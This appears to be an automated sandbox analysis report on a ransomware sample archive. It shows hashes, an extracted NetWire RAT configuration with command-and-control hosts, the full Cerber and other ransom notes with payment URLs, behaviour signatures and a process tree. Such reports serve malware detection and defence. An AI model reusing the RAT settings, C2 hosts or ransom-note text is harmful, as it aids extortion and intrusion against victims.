Analysis

  • max time kernel
    77s
  • max time network
    303s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    17-11-2024 16:30

General

  • Target

    RNSM00295.7z

  • Size

    13.0MB

  • MD5

    44ba5bd71576de83e067960138b8891b

  • SHA1

    835e22a76cb3a7ea168390e8c108051adac78752

  • SHA256

    8ed4b5d0a5bd733696802b71bc01d317f0add177925a82930edce4b7cc9a907a

  • SHA512

    161bdc166f50559720878d8c39a0fb3df5f0bd8bb323f6316fc8d99714e6f8f3d75d63a358cc528b32706399efee2088eda9afe45a2858216655e52c72c0aa8f

  • SSDEEP

    393216:Sp2W2xTnEXY4WwHE40lGwiuYAzH5P5q5Dp:223xERHP0lFiuL75PQ9

Malware Config

Extracted

Family

netwire

C2

micro.loginto.me:3360

c0der.ddns.net:3360

bakbumz.ddns.net:3360

Attributes
  • activex_autorun

    true

  • activex_key

    {IGXB136N-WP56-42I3-3EN8-85A00571YU01}

  • copy_executable

    true

  • delete_original

    false

  • host_id

    2016-%Rand%

  • install_path

    %AppData%\Install\Notepad.exe

  • keylogger_dir

    %AppData%\Logs\

  • lock_executable

    false

  • offline_keylogger

    true

  • password

    parola

  • registry_autorun

    true

  • startup_name

    Notepad

  • use_mutex

    false

Extracted

Path

C:\Users\Admin\Documents\_README_06X86G_.hta

Ransom Note
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>CERBER RANSOMWARE: Instructions</title> <HTA:APPLICATION APPLICATIONNAME="CERBER RANSOMWARE: Instructions" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize"> <style> a { color: #04a; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #222; font-family: "Lucida Sans Unicode", "Lucida Grande", sans-serif; font-size: 13pt; line-height: 19pt; } body, h1 { margin: 0; padding: 0; } hr { color: #bda; height: 2pt; margin: 1.5%; } h1 { color: #555; font-size: 14pt; } ol { padding-left: 2.5%; } ol li { padding-bottom: 13pt; } small { color: #555; font-size: 11pt; } ul { list-style-type: none; margin: 0; padding: 0; } .button { color: #04a; cursor: pointer; } .button:hover { text-decoration: underline; } .container { background-color: #fff; border: 2pt solid #c7c7c7; margin: 5%; min-width: 850px; padding: 2.5%; } .header { border-bottom: 2pt solid #c7c7c7; margin-bottom: 2.5%; padding-bottom: 2.5%; } .hr { background: #bda; display: block; height: 2pt; margin-top: 1.5%; margin-bottom: 1.5%; overflow: hidden; width: 100%; } .info { background-color: #efe; border: 2pt solid #bda; display: inline-block; padding: 1.5%; text-align: center; } .updating { color: red; display: none; padding-left: 35px; background: url('data:image/gif;base64,R0lGODlhGQAZAKIEAMzMzJmZmTMzM2ZmZgAAAAAAAAAAAAAAACH/C05FVFNDQVBFMi4wAwEAAAAh+QQFAAAEACwAAAAAGQAZAAADVki63P4wSEiZvLXemRf4yhYoQ0l9aMiVLISCDms+L/DIwwnfc+c3qZ9g6Hn5hkhF7YgUKI2dpvNpExJ/WKquSoMCvd9geDeuBpcuGFrcQWep5Df7jU0AACH5BAUAAAQALAoAAQAOABQAAAMwSLDU/iu+Gdl0FbTAqeXg5YCdSJCBuZVqKw5wC8/qHJv2IN+uKvytn9AnFBCHx0cCACH5BAUAAAQALAoABAAOABQAAAMzSLoEzrC5F9Wk9YK6Jv8gEYzgaH4myaVBqYbfIINyHdcDI+wKniu7YG+2CPI4RgFI+EkAACH5BAUAAAQALAQACgAUAA4AAAMzSLrcBNDJBeuUNd6WwXbWtwnkFZwMqUpnu6il06IKLChDrsxBGufAHW0C1IlwxeMieEkAACH5BAUAAAQALAEACgAUAA4AAAM0SLLU/lAtFquctk6aIe5gGA1kBpwPqVZn66hl1KINPDRB3sxAGufAHc0C1IkIxcARZ4QkAAAh+QQFAAAEACwBAAQADgAUAAADMUhK0vurSfiko8oKHC//yyCCYvmVI4cOZAq+UCCDcv3VM4cHCuDHOZ/wI/xxigDQMAEAIfkEBQAABAAsAQABAA4AFAAAAzNIuizOkLgZ13xraHVF1puEKWBYlUP1pWrLBLALz+0cq3Yg324PAUAXcNgaBlVGgPAISQAAIfkEBQAABAAsAQABABQADgAAAzRIujzOMBJHpaXPksAVHoogMlzpZWK6lF2UjgobSK9AtjSs7QTg8xCfELgQ/og9I1IxXCYAADs=') left no-repeat; } #change_language { float: right; } #change_language, #texts div { display: none; } </style> </head> <body> <div class="container"> <div class="header"> <a href="#" id="change_language" onclick="return changeLanguage();" title="English">&#9745; English</a> <h1>CERBER RANSOMWARE</h1> <small id="title">Instructions</small> </div> <div id="languages"> <p>&#9745; Select your language</p> <ul> <li><a href="#" title="English" onclick="return showBlock('en');">English</a></li> <li><a href="#" title="Arabic" onclick="return showBlock('ar');">العربية</a></li> <li><a href="#" title="Chinese" onclick="return showBlock('zh');">中文</a></li> <li><a href="#" title="Dutch" onclick="return showBlock('nl');">Nederlands</a></li> <li><a href="#" title="French" onclick="return showBlock('fr');">Français</a></li> <li><a href="#" title="German" onclick="return showBlock('de');">Deutsch</a></li> <li><a href="#" title="Italian" onclick="return showBlock('it');">Italiano</a></li> <li><a href="#" title="Japanese" onclick="return showBlock('ja');">日本語</a></li> <li><a href="#" title="Korean" onclick="return showBlock('ko');">한국어</a></li> <li><a href="#" title="Polish" onclick="return showBlock('pl');">Polski</a></li> <li><a href="#" title="Portuguese" onclick="return showBlock('pt');">Português</a></li> <li><a href="#" title="Spanish" onclick="return showBlock('es');">Español</a></li> <li><a href="#" title="Turkish" onclick="return showBlock('tr');">Türkçe</a></li> </ul> </div> <div id="texts"> <div id="en"> <p>Can't you find the necessary files?<br>Is the content of your files not readable?</p> <p>It is normal because the files' names and the data in your files have been encrypted by "Cerber&nbsp;Ransomware".</p> <p>It means your files are NOT damaged! Your files are modified only. This modification is reversible.<br>From now it is not possible to use your files until they will be decrypted.</p> <p>The only way to decrypt your files safely is to buy the special decryption software "Cerber&nbsp;Decryptor".</p> <p>Any attempts to restore your files with the third-party software will be fatal for your files!</p> <hr> <p class="w331208">You can proceed with purchasing of the decryption software at your personal page:</p> <p><span class="info"><span class="updating">Please wait...</span><a id="megaurl" class="url" href="http://fnmi62725zfti2vy.tor2web.org/B01F-CA3D-8E53-0090-9FD9" target="_blank">http://fnmi62725zfti2vy.tor2web.org/B01F-CA3D-8E53-0090-9FD9</a></span></p> <p>If this page cannot be opened &nbsp;<span class="button" onclick="return updateUrl('en');">click here</span>&nbsp; to get a new address of your personal page.<br><br>If the address of your personal page is the same as before after you tried to get a new one,<br>you can try to get a new address in one hour.</p> <p>At this page you will receive the complete instructions how to buy the decryption software for restoring all your files.</p> <p>Also at this page you will be able to restore any one file for free to be sure "Cerber&nbsp;Decryptor" will help you.</p> <hr> <p>If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor&nbsp;Browser:</p> <ol> <li>run your Internet browser (if you do not know what it is run the Internet&nbsp;Explorer);</li> <li>enter or copy the address <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">https://www.torproject.org/download/download-easy.html.en</a> into the address bar of your browser and press ENTER;</li> <li>wait for the site loading;</li> <li>on the site you will be offered to download Tor&nbsp;Browser; download and run it, follow the installation instructions, wait until the installation is completed;</li> <li>run Tor&nbsp;Browser;</li> <li>connect with the button "Connect" (if you use the English version);</li> <li>a normal Internet browser window will be opened after the initialization;</li> <li>type or copy the address <br><span class="info">http://fnmi62725zfti2vy.onion/B01F-CA3D-8E53-0090-9FD9</span><br> in this browser address bar;</li> <li>press ENTER;</li> <li>the site should be loaded; if for some reason the site is not loading wait for a moment and try again.</li> </ol> <p>If you have any problems during installation or use of Tor&nbsp;Browser, please, visit <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> and type request in the search bar "Install Tor&nbsp;Browser Windows" and you will find a lot of training videos about Tor&nbsp;Browser installation and use.</p> <hr> <p><strong>Additional information:</strong></p> <p>You will find the instructions ("*README*.hta") for restoring your files in any folder with your encrypted files.</p> <p>The instructions ("*README*.hta") in the folders with your encrypted files are not viruses! The instructions ("*README*.hta") will help you to decrypt your files.</p> <p>Remember! The worst situation already happened and now the future of your files depends on your determination and speed of your actions.</p> </div> <div id="ar" style="direction: rtl;"> <p>لا يمكنك العثور على الملفات الضرورية؟<br>هل محتوى الملفات غير قابل للقراءة؟</p> <p>هذا أمر طبيعي لأن أسماء الملفات والبيانات في الملفات قد تم تشفيرها بواسطة "Cerber&nbsp;Ransomware".</p> <p>وهذا يعني أن الملفات الخاصة بك ليست تالفة! فقد تم تعديل ملفاتك فقط. ويمكن التراجع عن هذا.<br>ومن الآن فإنه لا يكن استخدام الملفات الخاصة بك حتى يتم فك تشفيرها.</p> <p>الطريقة الوحيدة لفك تشفير ملفاتك بأمان هو أن تشتري برنامج فك التشفير المتخصص "Cerber&nbsp;Decryptor".</p> <p>إن أية محاولات لاستعادة الملفات الخاصة بك بواسطة برامج من طرف ثالث سوف تكون مدمرة لملفاتك!</p> <hr> <p>يمكنك الشروع في شراء برنامج فك التشفير من صفحتك الشخصية:</p> <p><span class="info"><span class="updating">أرجو الإنتظار...</span><a class="url" href="http://fnmi62725zfti2vy.tor2web.org/B01F-CA3D-8E53-0090-9FD9" target="_blank">http://fnmi62725zfti2vy.tor2web.org/B01F-CA3D-8E53-0090-9FD9</a></span></p> <p>في حالة تعذر فتح هذه الصفحة &nbsp;<span class="button" onclick="return updateUrl('ar');">انقر هنا</span>&nbsp; لإنشاء عنوان جديد لصفحتك الشخصية.</p> <p>في هذه الصفحة سوف تتلقى تعليمات كاملة حول كيفية شراء برنامج فك التشفير لاستعادة جميع الملفات الخاصة بك.</p> <p>في هذه الصفحة أيضًا سوف تتمكن من استعادة ملف واحد بشكل مجاني للتأكد من أن "Cerber&nbsp;Decryptor" سوف يساعدك.</p> <hr> <p>إذا كانت صفحتك الشخصية غير متاحة لفترة طويلة فإن ثمّة طريقة أخرى لفتح صفحتك الشخصية - تحميل واستخدام متصفح Tor:</p> <ol> <li>قم بتشغيل متصفح الإنترنت الخاص بك (إذا كنت لا تعرف ما هو قم بتشغيل إنترنت إكسبلورر);</li> <li>قم بكتابة أو نسخ العنوان <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">https://www.torproject.org/download/download-easy.html.en</a> إلى شريط العنوان في المستعرض الخاص بك ثم اضغط ENTER;</li> <li>انتظر لتحميل الموقع;</li> <li>سوف يعرض عليك الموقع تحميل متصفح Tor. قم بتحميله وتشغيله، واتبع تعليمات التثبيت، وانتظر حتى اكتمال التثبيت;</li> <li>قم بتشغيل متصفح Tor;</li> <li>اضغط على الزر "Connect" (إذا كنت تستخدم النسخة الإنجليزية);</li> <li>سوف تُفتح نافذة متصفح الإنترنت العادي بعد البدء;</li> <li>قم بكتابة أو نسخ العنوان <br><span class="info">http://fnmi62725zfti2vy.onion/B01F-CA3D-8E53-0090-9FD9</span><br> في شريط العنوان في المتصفح;</li> <li>اضغط ENTER;</li> <li>يجب أن يتم تحميل الموقع؛ إذا لم يتم تحميل الموقع لأي سبب، انتظر للحظة وحاول مرة أخرى.</li> </ol> <p>إذا كان لديك أية مشكلات أثناء عملية التثبيت أو استخدام متصفح Tor، يُرجى زيارة <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> واكتب الطلب "install tor browser windows" أو "تثبيت نوافذ متصفح Tor" في شريط البحث، وسوف تجد الكثير من أشرطة الفيديو للتدريب حول تثبيت متصفح Tor واستخدامه.</p> <hr> <p><strong>معلومات إضافية:</strong></p> <p>سوف تجد إرشادات استعادة الملفات الخاصة بك ("*README*") في أي مجلد مع ملفاتك المشفرة.</p> <p>الإرشادات ("*README*") الموجودة في المجلدات مع ملفاتك المشفرة ليست فيروسات والإرشادات ("*README*") سوف تساعدك على فك تشفير الملفات الخاصة بك.</p> <p>تذكر أن أسوأ موقف قد حدث بالفعل، والآن مستقبل ملفاتك يعتمد على عزيمتك وسرعة الإجراءات الخاصة بك.</p> </div> <div id="zh"> <p>您找不到所需的文件?<br>您文件的内容无法阅读?</p> <p>这是正常的,因为您文件的文件名和数据已经被“Cerber&nbsp;Ransomware”加密了。</p> <p>这意味着您的文件并没有损坏!您的文件只是被修改了,这个修改是可逆的,解密之前您无法使用您的文件。</p> <p>安全解密您文件的唯一方式是购买特别的解密软件“Cerber&nbsp;Decryptor”。</p> <p>任何使用第三方软件恢复您文件的方式对您的文件来说都将是致命的!</p> <hr> <p>您可以在您的个人页面上购买解密软件:</p> <p><span class="info"><span class="updating">请稍候...</span><a class="url" href="http://fnmi62725zfti2vy.tor2web.org/B01F-CA3D-8E53-0090-9FD9" target="_blank">http://fnmi62725zfti2vy.tor2web.org/B01F-CA3D-8E53-0090-9FD9</a></span></p> <p>如果这个页面无法打开,请 <span class="button" onclick="return updateUrl('zh');">点击这里</span> 生成您个人页面的新地址。</p> <p>您将在这个页面上看到如何购买解密软件以恢复您的文件。</p> <p>您可以在这个页面使用“Cerber&nbsp;Decryptor”免费恢复任何文件。</p> <hr> <p>如果您的个人页面长期不可用,有其他方法可以打开您的个人页面 - 安装并使用 Tor 浏览器:</p> <ol> <li>使用您的上网浏览器(如果您不知道使用 Internet&nbsp;Explorer 的话);</li> <li>在浏览器的地址栏输入或复制地址 <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">https://www.torproject.org/download/download-easy.html.en</a> 并按 ENTER 键;</li> <li>等待站点加载;</li> <li>您将在站点上下载 Tor 浏览器;下载并运行它,按照安装指南进行操作,等待直至安装完成;</li> <li>运行 Tor 浏览器;</li> <li>使用“Connect”按钮进行连接(如果您使用英文版);</li> <li>初始化之后将打开正常的上网浏览器窗口;</li> <li>在浏览器地址栏中输入或复制地址 <br><span class="info">http://fnmi62725zfti2vy.onion/B01F-CA3D-8E53-0090-9FD9</span><br></li> <li>按 ENTER 键;</li> <li>该站点将加载;如果由于某些原因等待一会儿后没有加载,请重试。</li> </ol> <p>如果在安装期间或使用 Tor 浏览器期间有任何问题,请访问 <a href="https://www.baidu.com/s?wd=%E6%80%8E%E4%B9%88%E5%AE%89%E8%A3%85%20tor%20%E6%B5%8F%E8%A7%88%E5%99%A8" target="_blank">https://www.baidu.com</a> 并在搜索栏中输入“怎么安装 Tor 浏览器”,您将找到有关如何安装洋葱 Tor 浏览器的说明和教程。</p> <hr> <p><strong>附加信息:</strong></p> <p>您将在任何带有加密文件的文件夹中找到恢复您文件(“*README*.hta”)的说明。</p> <p>带有加密文件的文件夹中的(“*README*.hta”)说明不是病毒,(“*README*.hta”)说明将帮助您解密您的文件。</p> <p>请记住,最坏的情况都发生过了,您的文件还能不能用取决于您的决定和反应速度。</p> </div> <div id="nl"> <p>Kunt u de nodige files niet vinden?<br>Is de inhoud van uw bestanden niet leesbaar?</p> <p>Het is gewoonlijk omdat de bestandsnamen en de gegevens in uw bestanden zijn versleuteld door “Cerber&nbsp;Ransomware”.</p> <p>Het betekent dat uw bestanden NIET beschadigd zijn! Uw bestanden zijn alleen gewijzigd. Deze wijzig

Extracted

Path

C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_ReCoVeRy_+fmhad.txt

Ransom Note
NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ? All of your files were protected by a strong encryption with RSA4096 More information about the encryption keys using RSA4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem) How did this happen ? !!! Specially for your PC was generated personal RSA4096 Key , both public and private. !!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet. !!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server What do I do ? So , there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: * http://t54ndnku456ngkwsudqer.wallymac.com/3959D58DB927D87 * http://po4dbsjbneljhrlbvaueqrgveatv.bonmawp.at/3959D58DB927D87 * http://hrfgd74nfksjdcnnklnwefvdsf.materdunst.com/3959D58DB927D87 If for some reasons the addresses are not available, follow these steps 1 Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2 After a successful installation, run the browser 3 Type in the address bar: xlowfznrg4wf7dli.onion/3959D58DB927D87 4 Follow the instructions on the site IMPORTANT INFORMATION Your personal pages http://t54ndnku456ngkwsudqer.wallymac.com/3959D58DB927D87 http://po4dbsjbneljhrlbvaueqrgveatv.bonmawp.at/3959D58DB927D87 http://hrfgd74nfksjdcnnklnwefvdsf.materdunst.com/3959D58DB927D87 Your personal pages TOR Browser xlowfznrg4wf7dli. onion/3959D58DB927D87
URLs

http://t54ndnku456ngkwsudqer.wallymac.com/3959D58DB927D87

http://po4dbsjbneljhrlbvaueqrgveatv.bonmawp.at/3959D58DB927D87

http://hrfgd74nfksjdcnnklnwefvdsf.materdunst.com/3959D58DB927D87

http://xlowfznrg4wf7dli.onion/3959D58DB927D87

Extracted

Path

C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+tvgdx.txt

Ransom Note
__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ? All of your files were protected by a strong encryption with RSA-4096. More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem) How did this happen ? !!! Specially for your PC was generated personal RSA-4096 KEY, both public and private. !!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet. !!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server What do I do ? So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way. If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment. For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: 1. http://ytrest84y5i456hghadefdsd.pontogrot.com/BE4BEDB76B6F7551 2. http://prest54538hnksjn4kjfwdbhwere.hotchunman.com/BE4BEDB76B6F7551 3. http://5rport45vcdef345adfkksawe.bematvocal.at/BE4BEDB76B6F7551 If for some reasons the addresses are not available, follow these steps: 1. Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. After a successful installation, run the browser and wait for initialization 3. Type in the address bar: fwgrhsao3aoml7ej.onion/BE4BEDB76B6F7551 4. Follow the instructions on the site. ---------------- IMPORTANT INFORMATION------------------------ *-*-* Your personal pages: http://ytrest84y5i456hghadefdsd.pontogrot.com/BE4BEDB76B6F7551 http://prest54538hnksjn4kjfwdbhwere.hotchunman.com/BE4BEDB76B6F7551 http://5rport45vcdef345adfkksawe.bematvocal.at/BE4BEDB76B6F7551 *-*-* Your personal page Tor-Browser: fwgrhsao3aoml7ej.ONION/BE4BEDB76B6F7551 *-*-* Your personal identification ID: BE4BEDB76B6F7551
URLs

http://ytrest84y5i456hghadefdsd.pontogrot.com/BE4BEDB76B6F7551

http://prest54538hnksjn4kjfwdbhwere.hotchunman.com/BE4BEDB76B6F7551

http://5rport45vcdef345adfkksawe.bematvocal.at/BE4BEDB76B6F7551

http://fwgrhsao3aoml7ej.onion/BE4BEDB76B6F7551

http://fwgrhsao3aoml7ej.ONION/BE4BEDB76B6F7551

Extracted

Path

C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\HELP_RECOVER_instructions+rgb.txt

Ransom Note
__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ? All of your files were protected by a strong encryption with RSA-4096. More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem) How did this happen ? !!! Specially for your PC was generated personal RSA-4096 KEY, both public and private. !!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet. Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server. What do I do ? So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way. If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment. For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: 1. http://pren874bwsdbmbwe.returnyourfiless.ru/BE4BEDB76B6F7551 2. http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/BE4BEDB76B6F7551 3. http://rr48nfhdj5wedsm99324.tuttianent.at/BE4BEDB76B6F7551 If for some reasons the addresses are not available, follow these steps: 1. Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. After a successful installation, run the browser and wait for initialization 3. Type in the address bar: yez2o5lwqkmlv5lc.onion/BE4BEDB76B6F7551 4. Follow the instructions on the site. !!! IMPORTANT INFORMATION: !!! Your personal pages: http://pren874bwsdbmbwe.returnyourfiless.ru/BE4BEDB76B6F7551 http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/BE4BEDB76B6F7551 http://rr48nfhdj5wedsm99324.tuttianent.at/BE4BEDB76B6F7551 !!! Your personal page Tor-Browser: yez2o5lwqkmlv5lc.onion/BE4BEDB76B6F7551 !!! Your personal identification ID: BE4BEDB76B6F7551
URLs

http://pren874bwsdbmbwe.returnyourfiless.ru/BE4BEDB76B6F7551

http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/BE4BEDB76B6F7551

http://rr48nfhdj5wedsm99324.tuttianent.at/BE4BEDB76B6F7551

http://yez2o5lwqkmlv5lc.onion/BE4BEDB76B6F7551

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • NetWire RAT payload 4 IoCs
  • Netwire

    Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.

  • Netwire family
  • Troldesh family
  • Troldesh, Shade, Encoder.858

    Troldesh is a ransomware spread by malspam.

  • UAC bypass 3 TTPs 2 IoCs
  • Windows security bypass 2 TTPs 5 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Modifies boot configuration data using bcdedit 1 TTPs 5 IoCs
  • Renames multiple (763) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Renames multiple (95) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Clears Network RDP Connection History and Configurations 1 TTPs 2 IoCs

    Remove evidence of malicious network connections to clean up operations traces.

  • Contacts a large (1684) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Disables taskbar notifications via registry modification
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 51 IoCs
  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 23 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Uses the VBS compiler for execution 1 TTPs
  • Windows security modification 2 TTPs 8 IoCs
  • Adds Run key to start application 2 TTPs 9 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops desktop.ini file(s) 28 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 5 IoCs

    AutoIT scripts compiled to PE executables.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • UPX packed file 12 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 47 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 4 IoCs
  • Interacts with shadow copies 3 TTPs 3 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer settings 1 TTPs 15 IoCs
  • NTFS ADS 1 IoCs
  • Opens file in notepad (likely ransom note) 3 IoCs
  • Runs regedit.exe 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 36 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 44 IoCs
  • Suspicious use of FindShellTrayWindow 41 IoCs
  • Suspicious use of SendNotifyMessage 38 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 11 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00295.7z"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:2560
  • C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2168
    • C:\Users\Admin\Desktop\00295\HEUR-Trojan-Ransom.Win32.Agent.gen-49e1a16ee8c68203aeb1870e7f73a1ad83434ef95afafe654e08dde6e687cc8e.exe
      HEUR-Trojan-Ransom.Win32.Agent.gen-49e1a16ee8c68203aeb1870e7f73a1ad83434ef95afafe654e08dde6e687cc8e.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      PID:2864
      • C:\Users\Admin\Desktop\00295\HEUR-Trojan-Ransom.Win32.Agent.gen-49e1a16ee8c68203aeb1870e7f73a1ad83434ef95afafe654e08dde6e687cc8e.exe
        C:\Users\Admin\Desktop\00295\HEUR-Trojan-Ransom.Win32.Agent.gen-49e1a16ee8c68203aeb1870e7f73a1ad83434ef95afafe654e08dde6e687cc8e.exe
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:1652
        • C:\Users\Admin\AppData\Roaming\Install\Notepad.exe
          "C:\Users\Admin\AppData\Roaming\Install\Notepad.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          PID:3440
          • C:\Users\Admin\AppData\Roaming\Install\Notepad.exe
            C:\Users\Admin\AppData\Roaming\Install\Notepad.exe
            5⤵
              PID:3676
      • C:\Users\Admin\Desktop\00295\HEUR-Trojan-Ransom.Win32.Agent.gen-5f90978da18b59f9c9f15798b9f04457b3814b0b16017c81c870fd8b7cba2d4a.exe
        HEUR-Trojan-Ransom.Win32.Agent.gen-5f90978da18b59f9c9f15798b9f04457b3814b0b16017c81c870fd8b7cba2d4a.exe
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        PID:2872
        • C:\Users\Admin\AppData\Roaming\daemon2.exe
          C:\Users\Admin\AppData\Roaming\daemon2.exe
          3⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          PID:1664
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" http://searchesin-cols.ru/
            4⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:3912
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3912 CREDAT:275457 /prefetch:2
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies Internet Explorer settings
              PID:2964
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3912 CREDAT:406533 /prefetch:2
              5⤵
                PID:812
        • C:\Users\Admin\Desktop\00295\HEUR-Trojan-Ransom.Win32.Agent.gen-bebd3b1683b69a383af7689f70ad3e3992630e0fc07d98e2e014f4978136722a.exe
          HEUR-Trojan-Ransom.Win32.Agent.gen-bebd3b1683b69a383af7689f70ad3e3992630e0fc07d98e2e014f4978136722a.exe
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
